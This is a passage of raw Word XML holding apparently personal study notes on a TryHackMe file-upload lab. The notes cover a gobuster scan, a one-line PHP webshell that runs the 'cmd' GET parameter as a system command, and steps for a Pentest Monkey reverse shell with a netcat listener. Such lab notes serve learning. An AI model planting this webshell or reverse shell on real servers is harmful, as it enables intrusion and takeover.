          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>File permissions prevent pages from being writeable by a regular user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1318ABB0" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Check source code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347F4C0A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Check for src and directory of said src</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1294FD74" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Ex. src=’images/spaniel.jpg’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CC16DA" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Upload another image with the same name as the one found (spaniel.jpg for example)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4895AB3C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>See if server will accept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D6EC99" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Remote Code Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403F6E37" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Likely to be a low-privileged user account (such as www-data on a linux server), still serious</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C741C81" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>RCE results from uploading a program written in the same language as the back-end of the website (or any language the server understands and will exe)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D76699C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Usually PHP, can use python Django, JS [node.js])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BE8353" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Two basic ways to achieve RCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C0F886" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Webshells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330AD96A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Practical option</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42437BD8" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Reverse shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F2DA1F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Ideal goal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA6AA22" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Upload and force run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D9B025" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Web shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A475475" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:lastRenderedPageBreak/>
        <w:t>Web page with upload form</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7FDE41" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Perform gobuster scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7E1D9B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve">“gobuster dir -u </w:t>
      </w:r>
      <w:hyperlink r:id="rId75" w:history="1">
        <w:r w:rsidRPr="00F512ED">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://demo.uploadvulns.thm</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve"> -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A42B3C6" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>“-e” – print full URLs in console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF7A57F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>-U and -P – username and password for basic auth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0694C891" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>“-p &lt;x&gt;” = proxy to use for requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DF0479" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>“-c &lt;http cookies&gt;” – specify a cookie for simulating your auth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABB465C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Find directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D871E4D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Directories can be input in URL for navigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A23283" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Create webshell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50788A74" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>PHP good place to start, though some enumeration may be necessary in real life application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B646D31" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Take a parameter and execute it as a system command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BDBD9B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Create php script in text editor and save with .php extension</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081F9DC2" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>PHP syntax:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF3C2AA" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057FCD87" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>echo system($_GET[“cmd”]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FC5863" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D7851C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Takes a GET parameter and executes it as a system command, echoing output to screen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681A7762" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Shell can be used to read files from the system or upgrade to a reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A62E050" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>When using webshells, easier to view output by looking at the source code of the page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E44449E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Reverse Shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0915EC" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Similar process to webshell upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439AE53D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Pentest Monkey reverse shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00F512ED">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="28591B38" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Edit line 49</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7606CF" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Change 127 IP to THM tun0 IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F040BD" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Start netcat listening post nc -lvnp 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F07126" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve">Upload shell and activate by navigating to </w:t>
      </w:r>
      <w:hyperlink r:id="rId76" w:history="1">
        <w:r w:rsidRPr="00F512ED">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://demo.uploadvulns.thm/uploads/shell.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7D317426" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Find upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D41E298" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Activate reverse shell by navigating to it and clicking on it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139EC6C0" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
